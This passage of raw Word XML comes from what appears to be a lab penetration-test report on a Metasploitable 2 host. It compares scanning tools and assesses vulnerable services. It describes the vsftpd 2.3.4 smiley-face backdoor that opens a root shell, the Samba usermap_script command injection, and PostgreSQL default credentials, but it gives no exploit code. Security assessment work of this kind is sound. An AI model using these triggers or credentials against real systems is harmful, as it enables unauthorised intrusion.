          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk indicators are based on the security implications of the identified service versions. They represent pre-exploitation risk classifications, not confirmed CVSS scores from active exploitation. Confirmed exploitation results are documented in Section 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5  Scanning Tool Comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap was selected as the primary scanning tool for this engagement. The table below provides a brief comparison with other common security scanning tools to contextualise Nmap's role and limitations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 9: Reconnaissance Tool Comparison</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Strengths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2626"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Limitations in This Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Nmap 7.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Port scanning &amp; service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Fast, precise, supports scripting engine (NSE); ideal for service fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2626"/>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Does not perform authenticated vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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OpenVAS / Greenbone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Comprehensive CVE database; authenticated scanning; detailed reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2626"/>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Heavier tool; not used in this lab exercise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Exploitation &amp; post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Extensive module library; integrates with Nmap output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2626"/>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Not a passive scanner; requires active interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Web server scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Identifies web misconfigurations and vulnerable components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2626"/>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Limited to HTTP/HTTPS services only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Assessment Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following service enumeration, each identified service was assessed for known security vulnerabilities using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST National Vulnerability Database (NVD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE CVE database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Where a service version matched a known CVE, the associated CVSS 3.1 base score was recorded. Where version information was insufficient to confirm a specific CVE, the risk classification was based on the security implications of the exposed service type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability assessment followed the principle of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evidence-based classification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — only findings supported by scan data and confirmed CVE records were classified as confirmed vulnerabilities. Services with potential weaknesses but without confirmed exploitation evidence were documented as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">exposure risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requiring further validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Critical Service Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.1  FTP Service — vsftpd 2.3.4 (Port 21)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The FTP service on port 21 was identified as running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd version 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This specific version is associated with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a critical backdoor vulnerability. Certain distributed copies of vsftpd 2.3.4 contained a maliciously inserted backdoor: when a username containing the characters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (smiley face) is sent during FTP authentication, the backdoor triggers and opens a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">root shell on TCP port 6200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This results in unauthenticated remote code execution with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A screenshot of the FTP connection is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000"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4457700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: FTP Service Connection to Target 10.0.2.9 Showing vsftpd 2.3.4 Banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.2  Samba SMB/NetBIOS (Ports 139 and 445)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports 139 and 445 expose the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba SMB service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0.20-Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This version is vulnerable to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2007-2447</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the Samba "usermap_script" command injection vulnerability. When the Samba server is configured with a username map script, an unauthenticated attacker can inject shell commands through the username field of the SMB connection negotiation. This results in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">remote code execution with the privileges of the Samba daemon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically root in this configuration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.3  PostgreSQL Database (Port 5432)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL service on port 5432 is externally accessible. PostgreSQL version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.0 – 8.3.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is installed. In the Metasploitable 2 configuration, the PostgreSQL service runs with default credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
